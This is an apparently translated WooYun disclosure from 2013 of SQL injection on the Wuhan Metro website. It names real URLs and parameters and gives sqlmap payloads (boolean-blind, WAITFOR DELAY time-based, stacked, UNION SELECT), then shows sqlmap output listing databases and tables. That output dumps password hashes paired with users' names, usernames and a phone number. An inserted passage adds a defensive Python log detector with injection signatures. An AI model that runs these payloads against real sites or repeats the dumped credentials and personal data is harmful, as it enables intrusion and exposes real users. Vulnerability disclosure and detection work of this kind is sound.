
Vulnerability summary

Defect ID: wooyun-2013-023873

Title: SQL injection vulnerability in the Wuhan Metro website

Affected vendor: Wuhan Metro website

Author: lucky

Submitted: 2013-05-17 14:30

Fix deadline: 2013-07-01 14:31

Published: 2013-07-01 14:31

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]



Vulnerability details

Disclosure status:

2013-05-17: Details sent to the vendor; awaiting the vendor's handling
2013-05-20: Vendor confirmed; details disclosed to the vendor only
2013-05-30: Details disclosed to core white hats and domain experts
2013-06-09: Details disclosed to regular white hats
2013-06-19: Details disclosed to intern white hats
2013-07-01: Details disclosed to the public

Brief description:

Detailed description:

http://www.whrt.gov.cn:8200/web/tms/JobList.aspx?t=1
Place: GET
Parameter: t
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: t=1' AND 9314=9314 AND 'arrX'='arrX
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: t=1'; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: t=1' WAITFOR DELAY '0:0:5'--
---


http://www.whrt.gov.cn:8200/web/tms/Page.aspx?id=43
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=43' AND 8962=8962 AND 'dCxJ'='dCxJ
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: id=-3937' UNION ALL SELECT 73, CHAR(58)+CHAR(98)+CHAR(121)+CHAR(108)+CHAR(58)+CHAR(72)+CHAR(122)+CHAR(113)+CHAR(116)+CHAR(120)+CHAR(70)+CHAR(102)+CHAR(100)+CHAR(108)+CHAR(87)+CHAR(58)+CHAR(119)+CHAR(100)+CHAR(110)+CHAR(58), 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=43'; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=43' WAITFOR DELAY '0:0:5'--
---
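The two findings above show three injection techniques against the `t` and `id` parameters: a boolean tautology (`' AND 9314=9314 ...`), a stacked/time-based `WAITFOR DELAY`, and a `UNION ALL SELECT` carrying a `CHAR()` concatenation. From a defender's side, all three leave a recognisable trace in the web server's access log. The detector below is an added example, not code from this report or from the affected site; it assumes IIS W3C-format log lines with the field order `date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status`, and the log lines it scans are constructed to mirror the payload shapes reported above.

```python
import re
from urllib.parse import parse_qsl

# Signatures for the injection classes reported above (boolean-based blind,
# time-based blind, stacked queries, UNION query with CHAR() concatenation).
SIGNATURES = [
    ("boolean-tautology", re.compile(r"'\s*AND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("time-based",        re.compile(r"\bWAITFOR\s+DELAY\s+'[\d:]+'", re.I)),
    ("stacked-query",     re.compile(r"'\s*;\s*\w", re.I)),
    ("union-select",      re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("char-concat",       re.compile(r"(CHAR\(\d+\)\s*\+\s*){2,}", re.I)),
]

# Constructed IIS W3C log lines (assumption: this field order); the queries
# are URL-encoded the way IIS stores them, matching the payload shapes above.
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status",
    "2013-05-17 14:30:01 10.0.0.5 GET /web/tms/JobList.aspx t=1 8200 - 198.51.100.2 Mozilla/5.0 200",
    "2013-05-17 14:30:02 10.0.0.5 GET /web/tms/JobList.aspx t=1%27+AND+9314%3D9314+AND+%27arrX%27%3D%27arrX 8200 - 203.0.113.7 sqlmap/1.0 200",
    "2013-05-17 14:30:03 10.0.0.5 GET /web/tms/JobList.aspx t=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3B-- 8200 - 203.0.113.7 sqlmap/1.0 200",
    "2013-05-17 14:30:09 10.0.0.5 GET /web/tms/Page.aspx id=-3937%27+UNION+ALL+SELECT+73%2C+CHAR%2858%29%2BCHAR%2898%29%2BCHAR%2858%29%2C+73-- 8200 - 203.0.113.7 sqlmap/1.0 500",
    "2013-05-17 14:30:10 10.0.0.5 GET /web/tms/Page.aspx id=43 8200 - 198.51.100.2 Mozilla/5.0 200",
]


def parse_iis_line(line):
    """Split one W3C log line into the fields the detector needs; skip headers."""
    fields = line.split()
    if line.startswith("#") or len(fields) < 9:
        return None
    return {
        "time": f"{fields[0]} {fields[1]}",
        "method": fields[3],
        "path": fields[4],
        "query": fields[5],
        "client": fields[8],
    }


def classify_query(raw_query):
    """Decode each query parameter and return (parameter, signature) hits.

    parse_qsl splits on '&' before percent-decoding, so an encoded ';' (%3B)
    inside a value stays part of that value and is seen by the signatures.
    """
    hits = []
    if raw_query == "-":          # IIS writes '-' when there is no query string
        return hits
    for name, value in parse_qsl(raw_query, keep_blank_values=True):
        for sig_name, pattern in SIGNATURES:
            if pattern.search(value):
                hits.append((name, sig_name))
    return hits


def scan_iis_log(lines):
    """Return one alert dict per (request, signature) match across the log."""
    alerts = []
    for line in lines:
        rec = parse_iis_line(line)
        if rec is None:
            continue
        for param, sig_name in classify_query(rec["query"]):
            alerts.append({
                "time": rec["time"],
                "client": rec["client"],
                "path": rec["path"],
                "param": param,
                "signature": sig_name,
            })
    return alerts


def clients_by_alert_count(alerts):
    """Aggregate alerts per source IP, most active first, for triage."""
    counts = {}
    for a in alerts:
        counts[a["client"]] = counts.get(a["client"], 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    found = scan_iis_log(SAMPLE_LOG)
    for a in found:
        print(f'{a["time"]} {a["client"]} {a["path"]}?{a["param"]} -> {a["signature"]}')
    print("per-client:", clients_by_alert_count(found))
```

The signatures are deliberately narrow (a quote followed by `AND n=n`, `WAITFOR DELAY` with a time literal, a quote-semicolon sequence, `UNION [ALL] SELECT`, repeated `CHAR()+`) so that ordinary search terms do not trip them; a single URL-decoding pass is applied, matching how the payloads above are sent. Grouping hits per client, as the last function does, is usually what turns a handful of alerts into an obvious scan.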


[02:02:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


available databases [5]:
[*] EUF
[*] master
[*] model
[*] msdb
[*] tempdb


Tables in the key database:

Database: EUF
[26 tables]
+------------------------------+
| dbo.EUF_SYS_ButtonPermission |
| dbo.EUF_SYS_Buttons          |
| dbo.EUF_SYS_Dictionary       |
| dbo.EUF_SYS_DictionaryType   |
| dbo.EUF_SYS_Menu             |
| dbo.EUF_SYS_Role             |
| dbo.EUF_SYS_RolePermission   |
| dbo.EUF_SYS_User             |
| dbo.EUF_SYS_UserRole         |
| dbo.PRE_Cate                 |
| dbo.PRE_DocVisitLog          |
| dbo.PRE_QueryLog             |
| dbo.aut_Job                  |
| dbo.aut_Question             |
| dbo.aut_Resume               |
| dbo.aut_p                    |
| dbo.aut_s                    |
| dbo.doc_files                |
| dbo.doc_table1               |
| dbo.doc_table2               |
| dbo.doc_table3               |
| dbo.doc_table4               |
| dbo.doc_table5               |
| dbo.doc_table6               |
| dbo.doc_table7               |
| dbo.index_task               |
+------------------------------+


Database: EUF
Table: dbo.EUF_SYS_User
[8 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| F_LoginUrl | varchar  |
| F_PassWord | varchar  |
| F_RealName | varchar  |
| F_RegDate  | datetime |
| F_RoleID   | varchar  |
| F_State    | varchar  |
| F_UserID   | int      |
| F_UserName | varchar  |
+------------+----------+


Data retrieved from the table:

[00:34:51] [INFO] fetching entries of column(s) 'F_PassWord, F_UserName' for table 'EUF_SYS_User' in database 'EUF'
[00:34:51] [INFO] fetching number of column(s) 'F_PassWord, F_UserName' entries for table 'EUF_SYS_User' in database 'EUF'
[00:34:51] [INFO] retrieved: 2247
[00:35:13] [INFO] fetching number of distinct values for column 'F_PassWord'
[00:35:13] [INFO] retrieved: 1579
[00:35:41] [INFO] fetching number of distinct values for column 'F_UserName'
[00:35:41] [INFO] retrieved: 2232
[00:36:01] [WARNING] no proper pivot column provided (with unique values). It won't be possible to retrieve all rows
[00:36:01] [INFO] retrieved: 0038B8ACA49559591C0E0A7DECDA2109
[00:39:50] [INFO] retrieved: 白重阳
[00:42:00] [INFO] retrieved: 0082FB3BDE4D0352EA216A4557625265
[00:46:36] [INFO] retrieved: 雷能
[00:48:08] [INFO] retrieved: 0094AD3326E94F398A0CE2E5469ED1D1
[00:52:25] [INFO] retrieved: 15871409546
[00:54:00] [INFO] retrieved: 00CA1622835B03A23F920FFC187A0603
[00:58:09] [INFO] retrieved: [email protected]
[01:01:06] [INFO] retrieved: 00D149ED03C84DE7803DCFDED3AF7CDD
[01:05:29] [INFO] retrieved: kangta8358
[01:06:59] [INFO] retrieved: 00E56BC84DAE888D58CDC0DFBD4B91C0
[01:11:24] [INFO] retrieved: rush1985
[01:12:29] [INFO] retrieved: 01533FF41E5D4226096DD191D5BDA6D4
[01:16:36] [INFO] retrieved: EasyKevin
[01:17:49] [INFO] retrieved: 0199B38A911715A857232DB2D4D4EC59
[01:22:13] [INFO] retrieved: 张鑫
[01:23:51] [INFO] retrieved: 01B90361881AD76688E1D3F06408C33E
[01:28:31] [INFO] retrieved: [email protected]
[01:30:45] [INFO] retrieved: 020EB9F88D9DAF9128B208D894381BCD
[01:34:48] [INFO] retrieved: 吴腾标
[01:36:55] [INFO] retrieved: 021E98A5E9F8843F2C7D8E3547F9D1DC
[01:41:36] [INFO] retrieved: susan870106
[01:43:05] [INFO] retrieved: 023299564B0DB47D5F3E476A254D0C21
[01:47:57] [INFO] retrieved: xy1992
[01:49:10] [INFO] retrieved: 0280DEFE4139A5F6B654612093FDA20A
[01:53:48] [INFO] retrieved: weihulove
[01:55:34] [INFO] retrieved: 029F927284212196F3A59CEFFD7A204C
[01:59:53] [INFO] retrieved: yanfang429
[02:01:07] [INFO] retrieved: 02AA01E3ABECF5529448ADA16A873462
[02:05:19] [INFO] retrieved: xiexianwen
Proof of vulnerability:

Remediation:

Copyright notice: credit the source when reposting: lucky@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2013-05-20 23:05

Vendor reply:

CNVD has confirmed and reproduced the described situation; on the afternoon of the 20th it was forwarded through CNCERT to the Hubei branch center, which will coordinate handling with the website's operating unit.
Scored as a full impact on confidentiality (multiple user records involved): rank = 7.79*1.0*1.4 = 10.906

Latest status:

None yet